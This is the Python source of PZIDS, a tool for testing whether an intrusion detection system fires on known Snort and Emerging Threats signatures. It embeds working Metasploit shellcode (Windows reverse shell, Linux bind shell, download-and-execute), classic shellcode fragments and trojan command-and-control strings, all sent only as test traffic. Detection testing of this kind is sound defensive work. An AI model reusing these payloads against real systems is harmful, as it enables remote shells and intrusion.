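#!/usr/bin/env python
# PZIDS (Peta Zetas IDS)
#
# pzids is a tool to test if your IDS
# is detecting threats properly.
#
# It includes some attack simulations
# from the inside and the outside that
# should match with your signatures.
#
# The name is taken from a well-known
# candy commercialized in Spain.
#
# GNU/GPLv3
# a0rtega
#
# Usage: pzids host port payload
#
# Each payload is a byte sample that a published Snort / Emerging
# Threats rule is expected to match.  The sample is written once to a
# plain TCP connection and the socket is closed; nothing is executed on
# either end.  Whether a sensor sees it as "outside -> inside" (1-8) or
# "inside -> outside" (a-g) depends on where this script and the target
# sit relative to the sensor, so run it from the side the rule expects.
from __future__ import print_function

import socket
import sys

# Seconds to wait for connect/send before giving up; a sensor test should
# never hang on an unreachable host.
CONNECT_TIMEOUT = 10

# From outside signatures ($EXTERNAL_NET any -> $HOME_NET any)
snort_shell_x86_noop = b'\x90' * 100
snort_shell_x86_setuid = b"\xB0\x17\xCD\x80"
snort_shell_x86_win_seh_eip = b"VTX630VXH49HHHPhYAAQhZYYYYAAQQDDDd36FFFFTXVj0PPTUPPa301089"
snort_shell_x86_linux_reverse = b"\x31\xDB\x53\x43\x53\x6A\x02\x6A\x66\x58\x89\xE1\xCD\x80"
snort_shell_x86_inc_ecx_noop = b'A' * 100

# * windows/shell_reverse_tcp - 314 bytes
# * http://www.metasploit.com
# * VERBOSE=false, LHOST=2.2.2.2, LPORT=666,
# * ReverseConnectRetries=5, EXITFUNC=process,
# * InitialAutoRunScript=, AutoRunScript=
# The generator parameters above are baked into the bytes; they are kept
# verbatim so the sample keeps matching the signature it was built for.
msf_shell_reverse_tcp = (
    b"\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52\x30"
    b"\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff"
    b"\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2"
    b"\xf0\x52\x57\x8b\x52\x10\x8b\x42\x3c\x01\xd0\x8b\x40\x78\x85"
    b"\xc0\x74\x4a\x01\xd0\x50\x8b\x48\x18\x8b\x58\x20\x01\xd3\xe3"
    b"\x3c\x49\x8b\x34\x8b\x01\xd6\x31\xff\x31\xc0\xac\xc1\xcf\x0d"
    b"\x01\xc7\x38\xe0\x75\xf4\x03\x7d\xf8\x3b\x7d\x24\x75\xe2\x58"
    b"\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b"
    b"\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff"
    b"\xe0\x58\x5f\x5a\x8b\x12\xeb\x86\x5d\x68\x33\x32\x00\x00\x68"
    b"\x77\x73\x32\x5f\x54\x68\x4c\x77\x26\x07\xff\xd5\xb8\x90\x01"
    b"\x00\x00\x29\xc4\x54\x50\x68\x29\x80\x6b\x00\xff\xd5\x50\x50"
    b"\x50\x50\x40\x50\x40\x50\x68\xea\x0f\xdf\xe0\xff\xd5\x89\xc7"
    b"\x68\x02\x02\x02\x02\x68\x02\x00\x02\x9a\x89\xe6\x6a\x10\x56"
    b"\x57\x68\x99\xa5\x74\x61\xff\xd5\x68\x63\x6d\x64\x00\x89\xe3"
    b"\x57\x57\x57\x31\xf6\x6a\x12\x59\x56\xe2\xfd\x66\xc7\x44\x24"
    b"\x3c\x01\x01\x8d\x44\x24\x10\xc6\x00\x44\x54\x50\x56\x56\x56"
    b"\x46\x56\x4e\x56\x56\x53\x56\x68\x79\xcc\x3f\x86\xff\xd5\x89"
    b"\xe0\x4e\x56\x46\xff\x30\x68\x08\x87\x1d\x60\xff\xd5\xbb\xf0"
    b"\xb5\xa2\x56\x68\xa6\x95\xbd\x9d\xff\xd5\x3c\x06\x7c\x0a\x80"
    b"\xfb\xe0\x75\x05\xbb\x47\x13\x72\x6f\x6a\x00\x53\xff\xd5"
)

# * linux/x86/shell_bind_tcp - 78 bytes
# * http://www.metasploit.com
# * VERBOSE=false, LPORT=4444, RHOST=, PrependSetresuid=false,
# * PrependSetreuid=false, PrependSetuid=false,
# * PrependChrootBreak=false, AppendExit=false,
# * InitialAutoRunScript=, AutoRunScript=
msf_shell_bind_tcp = (
    b"\x31\xdb\xf7\xe3\x53\x43\x53\x6a\x02\x89\xe1\xb0\x66\xcd\x80"
    b"\x5b\x5e\x52\x68\xff\x02\x11\x5c\x6a\x10\x51\x50\x89\xe1\x6a"
    b"\x66\x58\xcd\x80\x89\x41\x04\xb3\x04\xb0\x66\xcd\x80\x43\xb0"
    b"\x66\xcd\x80\x93\x59\x6a\x3f\x58\xcd\x80\x49\x79\xf8\x68\x2f"
    b"\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0"
    b"\x0b\xcd\x80"
)

# * windows/download_exec - 359 bytes
# * http://www.metasploit.com
# * VERBOSE=false, URL=http://example.com/
msf_down_exec = (
    b"\xeb\x10\x5a\x4a\x33\xc9\x66\xb9\x3c\x01\x80\x34\x0a\x99\xe2"
    b"\xfa\xeb\x05\xe8\xeb\xff\xff\xff\x70\x4c\x99\x99\x99\xc3\xfd"
    b"\x38\xa9\x99\x99\x99\x12\xd9\x95\x12\xe9\x85\x34\x12\xd9\x91"
    b"\x12\x41\x12\xea\xa5\x12\xed\x87\xe1\x9a\x6a\x12\xe7\xb9\x9a"
    b"\x62\x12\xd7\x8d\xaa\x74\xcf\xce\xc8\x12\xa6\x9a\x62\x12\x6b"
    b"\xf3\x97\xc0\x6a\x3f\xed\x91\xc0\xc6\x1a\x5e\x9d\xdc\x7b\x70"
    b"\xc0\xc6\xc7\x12\x54\x12\xdf\xbd\x9a\x5a\x48\x78\x9a\x58\xaa"
    b"\x50\xff\x12\x91\x12\xdf\x85\x9a\x5a\x58\x78\x9b\x9a\x58\x12"
    b"\x99\x9a\x5a\x12\x63\x12\x6e\x1a\x5f\x97\x12\x49\xf3\x9d\xc0"
    b"\x71\xc9\x99\x99\x99\x1a\x5f\x94\xcb\xcf\x66\xce\x65\xc3\x12"
    b"\x41\xf3\x98\xc0\x71\xa4\x99\x99\x99\x1a\x5f\x8a\xcf\xdf\x19"
    b"\xa7\x19\xec\x63\x19\xaf\x19\xc7\x1a\x75\xb9\x12\x45\xf3\xb9"
    b"\xca\x66\xce\x75\x5e\x9d\x9a\xc5\xf8\xb7\xfc\x5e\xdd\x9a\x9d"
    b"\xe1\xfc\x99\x99\xaa\x59\xc9\xc9\xca\xcf\xc9\x66\xce\x65\x12"
    b"\x45\xc9\xca\x66\xce\x69\xc9\x66\xce\x6d\xaa\x59\x35\x1c\x59"
    b"\xec\x60\xc8\xcb\xcf\xca\x66\x4b\xc3\xc0\x32\x7b\x77\xaa\x59"
    b"\x5a\x71\xbf\x66\x66\x66\xde\xfc\xed\xc9\xeb\xf6\xfa\xd8\xfd"
    b"\xfd\xeb\xfc\xea\xea\x99\xde\xfc\xed\xca\xe0\xea\xed\xfc\xf4"
    b"\xdd\xf0\xeb\xfc\xfa\xed\xf6\xeb\xe0\xd8\x99\xce\xf0\xf7\xdc"
    b"\xe1\xfc\xfa\x99\xdc\xe1\xf0\xed\xcd\xf1\xeb\xfc\xf8\xfd\x99"
    b"\xd5\xf6\xf8\xfd\xd5\xf0\xfb\xeb\xf8\xeb\xe0\xd8\x99\xec\xeb"
    b"\xf5\xf4\xf6\xf7\x99\xcc\xcb\xd5\xdd\xf6\xee\xf7\xf5\xf6\xf8"
    b"\xfd\xcd\xf6\xdf\xf0\xf5\xfc\xd8\x99\x68\x74\x74\x70\x3a\x2f"
    b"\x2f\x65\x78\x61\x6d\x70\x6c\x65\x2e\x63\x6f\x6d\x2f\x80"
)

# To outside signatures ($HOME_NET any -> $EXTERNAL_NET any)
snort_att_resp_dir_list = b"Volume Serial Number"
snort_spy_keylogg_ardamax = b"{D082139B-D5E4-4e63-B866-9BFC97880A48}"
snort_back_bandook = b"&first& "
et_trojan_imddos = (
    b"GET / HTTP/1.1\x0D\x0AHost: randomhost:1234\x0D\x0AConnection: keep-alive\x0D\x0A"
    b"User-Agent: STORMDDOS\x0D\x0A\x0D\x0A"
)
et_trojan_gh0st = b"Gh0st"
et_trojan_ngrbot = b"PASS ngrBot"
et_trojan_zeus_eyestye = b"AAAAA\xB4\xB4\xB4\xB4\xBC\xBF\xBF\xBF\xBF\xBD\xBD\xBD\xBD\xB3\xB3\xB3\xB3"

# Command-line payload key -> sample bytes.  Keys match the help table;
# a dict replaces the original if/elif chain so the table and the
# dispatch cannot drift apart.
PAYLOADS = {
    "1": snort_shell_x86_noop,
    "2": snort_shell_x86_setuid,
    "3": snort_shell_x86_win_seh_eip,
    "4": snort_shell_x86_linux_reverse,
    "5": snort_shell_x86_inc_ecx_noop,
    "6": msf_shell_reverse_tcp,
    "7": msf_shell_bind_tcp,
    "8": msf_down_exec,
    "a": snort_att_resp_dir_list,
    "b": snort_spy_keylogg_ardamax,
    "c": snort_back_bandook,
    "d": et_trojan_imddos,
    "e": et_trojan_gh0st,
    "f": et_trojan_ngrbot,
    "g": et_trojan_zeus_eyestye,
}


def usage(prog):
    """Print the command-line help and the payload table to stdout.

    Args:
        prog: the program name shown in the usage examples (argv[0]).
    """
    print("PZIDS (Peta Zetas IDS) Help")
    print("%s host port payload" % (prog,))
    print("%s 127.0.0.1 80 1\n" % (prog,))
    print("Payloads:\n")
    print("$EXTERNAL_NET any -> $HOME_NET any")
    print(" 1 (Snort - SHELLCODE x86 NOOP)")
    print(" 2 (Snort - SHELLCODE x86 setuid 0)")
    print(" 3 (Snort - SHELLCODE x86 Windows 32-bit SEH get EIP technique)")
    print(" 4 (Snort - SHELLCODE x86 Linux reverse connect shellcode)")
    print(" 5 (Snort - SHELLCODE x86 inc ecx NOOP)")
    print(" 6 (MSF - windows/shell_reverse_tcp)")
    print(" 7 (MSF - linux/x86/shell_bind_tcp)")
    print(" 8 (MSF - windows/download_exec)")
    print()
    print("$HOME_NET any -> $EXTERNAL_NET any")
    print(" a (Snort - ATTACK-RESPONSES directory listing)")
    print(" b (Snort - SPYWARE-PUT Keylogger ardamax keylogger runtime detection - ftp)")
    print(" c (Snort - BACKDOOR bandook 1.0 runtime detection)")
    print(" d (Emerging-threats - ET TROJAN IMDDOS Botnet User-Agent STORMDDOS)")
    print(" e (Emerging-threats - ET TROJAN Gh0st Trojan CnC)")
    print(" f (Emerging-threats - ET TROJAN NgrBot IRC CnC Channel Join)")
    print(" g (Emerging-threats - ET TROJAN Zeus/EyeStye Communication 0)")


def select_payload(key):
    """Return the sample bytes registered under *key*, or None if unknown.

    Args:
        key: the payload selector from the command line ("1".."8", "a".."g").
    """
    return PAYLOADS.get(key)


def send_payload(host, port, buff, timeout=CONNECT_TIMEOUT):
    """Open one TCP connection to host:port, send *buff* in full and close it.

    Args:
        host: hostname or IP address to connect to.
        port: TCP port as an int.
        buff: the bytes to send.
        timeout: seconds allowed for connect and send.

    Raises:
        socket.error: if the connection or the send fails.
    """
    print("Connecting ...")
    sock = socket.create_connection((host, port), timeout)
    try:
        print("Sending payload ...")
        # sendall, not send: send() may write only a prefix of a large
        # sample, which would silently weaken the signature test.
        sock.sendall(buff)
    finally:
        # Close on the error path too; the original leaked the socket
        # when send() raised.
        sock.close()


def main(argv):
    """Parse argv, pick the payload and send it; return the process exit code.

    Args:
        argv: the full argument vector, including the program name.

    Returns:
        0 on success or when help was shown, 1 on any error.
    """
    if len(argv) != 4:
        usage(argv[0])
        return 0

    host, port, payload = argv[1], argv[2], argv[3]

    buff = select_payload(payload)
    if buff is None:
        print("Error: Unknown payload.")
        return 1

    # Validate the port before touching the network so a typo is not
    # reported as a connection failure (the original bare except did that).
    try:
        port_num = int(port)
    except ValueError:
        print("Error: Invalid port %s" % (port,))
        return 1

    # Only network errors are handled here; KeyboardInterrupt and friends
    # propagate instead of being swallowed.
    try:
        send_payload(host, port_num, buff)
    except socket.error:
        print("Error: Unable to connect to %s:%s" % (host, port))
        return 1

    print("Sent!")
    return 0


if __name__ == "__main__":
    sys.exit(main(sys.argv))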